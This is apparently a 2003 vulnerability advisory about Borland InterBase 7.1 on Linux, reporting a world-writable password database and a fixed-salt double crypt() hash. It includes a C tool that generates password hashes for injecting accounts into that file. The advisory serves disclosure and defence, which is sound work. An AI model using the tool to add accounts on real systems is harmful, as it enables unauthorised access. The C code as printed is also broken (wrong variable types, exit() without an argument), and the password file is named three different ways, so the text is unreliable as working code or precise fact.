======Borland's InterBase 7.1 poor Password Data File Permissions and Password Hash====== //November 26, 2003//

**I. BACKGROUND**

Excerpt from http://www.borland.com/interbase

"Borland InterBase raises the bar for performance and power in small footprint databases. Designed for use in situations where there is no database administrator or IT support, InterBase is powerful enough to support mission-critical applications, yet compact enough to run on very modest systems. It can be easily transported by disk, CD, or even dial-up download. And unlike enterprise databases that require expensive ecosystems of support and maintenance, InterBase requires virtually no maintenance."

**II. DESCRIPTION**

The "information database" stored in the file admin4.pcb is read and writeable for all users with local access to the system.

''[root@Fester interbase]# ls -l /opt/interbase/admin.ib -rw-rw-rw- 1 root root 616497 Nov 20 10:04 /opt/interbase/admin.ib''

Not only is the password file stored read writeable by all local users but the password hash is done with one salt "9z" and then hashed again. As an addition to the permissions issue, I thought I should flesh out the fact that the double crypt() does not add any security to the hash with out the salt. The purpose of the salt is so that the same passwords dont always have the same hashes. With them removing the salt the hashes will always be the same for the same password reguardless of crypt() being called twice.

This can be expressed in this line pesudo C: ''crypt(&crypt(user_password,"9z")[2],"9z")''

**III. ANALYSIS**

Local attackers can exploit this vulnerability to add or modify accounts in Interbase. The following C program will generate hashed passwords that can be injected into admin.ib database. <code c>
/*Larry W. Cashdollar
Vapid Labs.
Borland Interbase 7.1 password creator. lwc@vapid.dhs.org */

#include <stdio.h>
#include <unistd.h>

#define SALT "9z"

int main (int argc, char *argv[]) {

char crypt1,crypt2;

if (!argv[1]) {
printf ("Borland InterBase db password tool.\n Larry Cashdollar, vapid labs\nEnter desired password as an argument\n");

exit();
}

        crypt1 =(char *) crypt (argv[1],SALT);
        crypt2 =(char *) crypt (&crypt1[2],SALT);

        printf("Double crypt() is: %s\n",crypt2);
        printf("With out salt (as stored in isc4.gdb/admin.ib: %s\n",&crypt2[2]);
        return(0);

}
</code>

**IV. DETECTION**

It appears all 7.x versions of Borland InterBase for Linux are affected.

http://www.borland.com/interbase/

**V. WORKAROUND**

Set file admin.ib permissions to a more restrictive setting.

**VI. VENDOR FIX**

Notified by iDEFENSE.

**VII. CVE INFORMATION**

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has not assigned an identification number to this issue.

**IIX. CREDIT**

Larry W. Cashdollar (http://vapid.dhs.org) discovered this vulnerability.